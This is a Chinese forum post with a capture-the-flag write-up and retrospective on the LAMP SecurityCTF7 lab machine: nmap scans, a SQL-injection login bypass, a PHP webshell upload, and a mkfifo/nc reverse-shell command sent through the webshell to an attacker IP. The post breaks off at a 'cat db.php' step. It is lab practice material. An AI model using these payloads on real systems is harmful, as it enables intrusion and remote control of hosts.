登录/ 注册
 找回密码
 立即注册
关闭

CSDN热搜

程序园 精品问答 技术交流 资源下载
返回列表 发新帖
首页 业界区 安全 LAMP SecurityCTF7 WP&复盘

LAMP SecurityCTF7 WP&复盘

慕疼 前天 17:13
这台靶机进入了一个思维误区,故复盘记录
资产很多,兔子洞也很多
其实不用先拿到apache再横向提权的
这个靶机sql注入漏洞很多而且各种各样,我当时先SQL注入dump了数据库,当时卡着是因为ssh旧算法kali不支持,所以ssh连不上,hydra也爆不出来
再加上资产很多,就觉得密码喷射的概率不大,感觉直接连ssh概率不大,就没有折腾了
在roundcude,smb上也浪费了一些时间
还有一点,就是最关键的brian用户的MD5密码没有爆出来,因为当时直接用sqlmap顺便给rockyou爆的,以后还是不能图方便,要用专业工具
这个靶机利用原理很简单,但是做起来并不很顺畅,感觉之后还是要多练这种资产多的机器
nmap扫描

端口扫描
  1. ┌──(kali㉿kali)-[~/Redteam/replay/ctf7]
  2. └─$ nmap -sT --min-rate=10000 -p- 10.10.10.140 -oA nmapscan/ports
  3. Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-16 04:57 EDT
  4. Nmap scan report for 10.10.10.140
  5. Host is up (0.027s latency).
  6. Not shown: 65497 filtered tcp ports (no-response), 29 filtered tcp ports (host-unreach)
  7. PORT      STATE  SERVICE
  8. 22/tcp    open   ssh
  9. 80/tcp    open   http
  10. 137/tcp   closed netbios-ns
  11. 138/tcp   closed netbios-dgm
  12. 139/tcp   open   netbios-ssn
  13. 901/tcp   open   samba-swat
  14. 5900/tcp  closed vnc
  15. 8080/tcp  open   http-proxy
  16. 10000/tcp open   snet-sensor-mgmt
  17. MAC Address: 00:0C:29:56:23:07 (VMware)
  19. Nmap done: 1 IP address (1 host up) scanned in 23.90 seconds
复制代码
开的服务有点多
  1. ┌──(kali㉿kali)-[~/Redteam/replay/ctf7]
  2. └─$ port=$(cat nmapscan/ports.nmap|grep open | awk -F '/' '{print $1}'| paste -sd ',')
复制代码
进行tcp详细扫描,然后判断渗透优先级
  1. ┌──(kali㉿kali)-[~/Redteam/replay/ctf7]
  2. └─$ nmap -sT -sC -sV -O -p22,80,139,901,8080,10000 10.10.10.140 -oA nmapscan/detail
  3. Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-16 05:02 EDT
  4. Nmap scan report for 10.10.10.140
  5. Host is up (0.0017s latency).
  7. PORT      STATE SERVICE     VERSION
  8. 22/tcp    open  ssh         OpenSSH 5.3 (protocol 2.0)
  9. | ssh-hostkey:
  10. |   1024 41:8a:0d:5d:59:60:45:c4:c4:15:f3:8a:8d:c0:99:19 (DSA)
  11. |_  2048 66:fb:a3:b4:74:72:66:f4:92:73:8f:bf:61:ec:8b:35 (RSA)
  12. 80/tcp    open  http        Apache httpd 2.2.15 ((CentOS))
  13. |_http-title: Mad Irish Hacking Academy
  14. |_http-server-header: Apache/2.2.15 (CentOS)
  15. | http-cookie-flags:
  16. |   /:
  17. |     PHPSESSID:
  18. |_      httponly flag not set
  19. 139/tcp   open  netbios-ssn Samba smbd 3.5.10-125.el6 (workgroup: MYGROUP)
  20. 901/tcp   open  http        Samba SWAT administration server
  21. | http-auth:
  22. | HTTP/1.0 401 Authorization Required\x0D
  23. |_  Basic realm=SWAT
  24. |_http-title: 401 Authorization Required
  25. 8080/tcp  open  http        Apache httpd 2.2.15 ((CentOS))
  26. |_http-server-header: Apache/2.2.15 (CentOS)
  27. | http-title: Admin :: Mad Irish Hacking Academy
  28. |_Requested resource was /login.php
  29. | http-cookie-flags:
  30. |   /:
  31. |     PHPSESSID:
  32. |_      httponly flag not set
  33. |_http-open-proxy: Proxy might be redirecting requests
  34. 10000/tcp open  http        MiniServ 1.610 (Webmin httpd)
  35. | http-robots.txt: 1 disallowed entry
  36. |_/
  37. |_http-title: Login to Webmin
  38. MAC Address: 00:0C:29:56:23:07 (VMware)
  39. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  40. Device type: general purpose|router|storage-misc|media device|webcam
  41. Running (JUST GUESSING): Linux 2.6.X|3.X|4.X|5.X (97%), MikroTik RouterOS 7.X (91%), Drobo embedded (89%), Synology DiskStation Manager 5.X (89%), LG embedded (88%), Tandberg embedded (88%)
  42. OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 cpe:/h:drobo:5n cpe:/a:synology:diskstation_manager:5.2
  43. Aggressive OS guesses: Linux 2.6.32 - 3.13 (97%), Linux 2.6.32 - 3.10 (97%), Linux 2.6.32 - 2.6.39 (94%), Linux 2.6.32 - 3.5 (92%), Linux 3.2 (91%), Linux 3.2 - 3.16 (91%), Linux 3.2 - 3.8 (91%), Linux 2.6.32 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.14 (91%)
  44. No exact OS matches for host (test conditions non-ideal).
  45. Network Distance: 1 hop
  47. Host script results:
  48. |_smb2-time: Protocol negotiation failed (SMB2)
  49. | smb-security-mode:
  50. |   account_used: guest
  51. |   authentication_level: user
  52. |   challenge_response: supported
  53. |_  message_signing: disabled (dangerous, but default)
  54. | smb-os-discovery:
  55. |   OS: Unix (Samba 3.5.10-125.el6)
  56. |   Computer name: localhost
  57. |   NetBIOS computer name:
  58. |   Domain name:
  59. |   FQDN: localhost
  60. |_  System time: 2025-08-25T03:06:47-04:00
  61. |_clock-skew: mean: -21d23h55m41s, deviation: 2h49m44s, median: -22d01h55m43s
  63. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  64. Nmap done: 1 IP address (1 host up) scanned in 89.28 seconds
复制代码
smb是user级的,所以先不考虑
先看80,8080,10000
同时进行脚本扫描
  1. ┌──(kali㉿kali)-[~/Redteam/replay/ctf7]
  2. └─$ nmap --script=vuln -p22,80,139,901,8080,10000 10.10.10.140 -oA nmapscan/vuln
  3. Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-16 05:05 EDT
  4. Nmap scan report for 10.10.10.140
  5. Host is up (0.0010s latency).
  7. PORT      STATE SERVICE
  8. 22/tcp    open  ssh
  9. 80/tcp    open  http
  10. | http-cookie-flags:
  11. |   /:
  12. |     PHPSESSID:
  13. |_      httponly flag not set
  14. | http-slowloris-check:
  15. |   VULNERABLE:
  16. |   Slowloris DOS attack
  17. |     State: LIKELY VULNERABLE
  18. |     IDs:  CVE:CVE-2007-6750
  19. |       Slowloris tries to keep many connections to the target web server open and hold
  20. |       them open as long as possible.  It accomplishes this by opening connections to
  21. |       the target web server and sending a partial request. By doing so, it starves
  22. |       the http server's resources causing Denial Of Service.
  23. |      
  24. |     Disclosure date: 2009-09-17
  25. |     References:
  26. |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
  27. |_      http://ha.ckers.org/slowloris/
  28. | http-enum:
  29. |   /webmail/: Mail folder
  30. |   /css/: Potentially interesting directory w/ listing on 'apache/2.2.15 (centos)'
  31. |   /icons/: Potentially interesting folder w/ directory listing
  32. |   /img/: Potentially interesting directory w/ listing on 'apache/2.2.15 (centos)'
  33. |   /inc/: Potentially interesting directory w/ listing on 'apache/2.2.15 (centos)'
  34. |   /js/: Potentially interesting directory w/ listing on 'apache/2.2.15 (centos)'
  35. |_  /webalizer/: Potentially interesting folder
  36. |_http-dombased-xss: Couldn't find any DOM based XSS.
  37. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
  38. |_http-trace: TRACE is enabled
  39. |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
  40. | http-fileupload-exploiter:
  41. |   
  42. |     Couldn't find a file-type field.
  43. |   
  44. |     Couldn't find a file-type field.
  45. |   
  46. |     Couldn't find a file-type field.
  47. |   
  48. |     Couldn't find a file-type field.
  49. |   
  50. |     Couldn't find a file-type field.
  51. |   
  52. |_    Couldn't find a file-type field.
  53. | http-csrf:
  54. | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.140
  55. |   Found the following possible CSRF vulnerabilities:
  56. |     
  57. |     Path: http://10.10.10.140:80/signup
  58. |     Form id: email
  59. |_    Form action: /signup_scr
  60. 139/tcp   open  netbios-ssn
  61. 901/tcp   open  samba-swat
  62. 8080/tcp  open  http-proxy
  63. |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
  64. |_http-trace: TRACE is enabled
  65. | http-cookie-flags:
  66. |   /:
  67. |     PHPSESSID:
  68. |       httponly flag not set
  69. |   /login.php:
  70. |     PHPSESSID:
  71. |_      httponly flag not set
  72. | http-enum:
  73. |   /login.php: Possible admin folder
  74. |   /phpmyadmin/: phpMyAdmin
  75. |   /docs/: Potentially interesting directory w/ listing on 'apache/2.2.15 (centos)'
  76. |   /icons/: Potentially interesting folder w/ directory listing
  77. |_  /inc/: Potentially interesting directory w/ listing on 'apache/2.2.15 (centos)'
  78. 10000/tcp open  snet-sensor-mgmt
  79. MAC Address: 00:0C:29:56:23:07 (VMware)
  81. Host script results:
  82. | smb-vuln-cve2009-3103:
  83. |   VULNERABLE:
  84. |   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
  85. |     State: VULNERABLE
  86. |     IDs:  CVE:CVE-2009-3103
  87. |           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
  88. |           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
  89. |           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
  90. |           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
  91. |           aka "SMBv2 Negotiation Vulnerability."
  92. |           
  93. |     Disclosure date: 2009-09-08
  94. |     References:
  95. |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
  96. |_      http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
  97. | smb-vuln-regsvc-dos:
  98. |   VULNERABLE:
  99. |   Service regsvc in Microsoft Windows systems vulnerable to denial of service
  100. |     State: VULNERABLE
  101. |       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
  102. |       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
  103. |       while working on smb-enum-sessions.
  104. |_         
  105. |_smb-vuln-ms10-061: false
  106. |_smb-vuln-ms10-054: false
  108. Nmap done: 1 IP address (1 host up) scanned in 121.85 seconds
复制代码
在8080端口,使用万能sql注入1' or1=1-- -直接进入后台,并且发现http://10.10.10.140:8080/readings.php?id=1&op=edit可以直接上传文件,尝试利用
1.png

先尝试文件上传是否可以利用
先直接写一个木马
2.png

3.png

可以看到上传成功了
接下来爆破目录找一下上传位置,同时在看一下nmap脚本扫描中有没有什么有用的信息
中途发现如果重新编辑这个上传,会报错:
4.png

它的uploading上传到assets目录上,可以留意一下这个目录会不会是upload目录
找了找,在
5.png

果然找到了上传的php
这个地方,是在8080端口上传的php,却在80端口的目录下找到的文件
这种情况是合理的,以后多web服务需要考虑共享文件系统等情况
6.png

可以看到可以成功利用
接下来反弹shell
试了试,好像无法成功通过木马反弹,可能有一点限制
  1. http://10.10.10.140/assets/muma.php?aaa=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/bash%20-i%202%3E&1|nc%2010.10.10.128%20443%20%3E/tmp/f
复制代码
尝试直接上传反弹shell
直接上传可以利用:
7.png
  1. bash-4.1$ cd home
  2. cd home
  3. bash-4.1$ ls
  4. ls
  5. alice  brian  bruce  charles  john  julia  leon  michael  neil        ruby  webdev
复制代码
可以看到有很多用户
用户多的情况下,试试递归拿密码
没有用,看了下这些目录没有查看权限
还有很多线索没用上,之前在8080端口使用万能密码进去,说明有SQL注入
尝试拿数据库,里面或许有能用
也可以直接在初始shell里找找能不能直接登录数据库
先查找数据库配置文件
[code]cat db.php
LAMPSecurityCTF7WPamp复盘

使用道具 举报

相关推荐
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册
发帖
慕疼
前天 17:13

0

粉丝关注

13

主题发布

板块介绍填写区域,请于后台编辑
微信扫一扫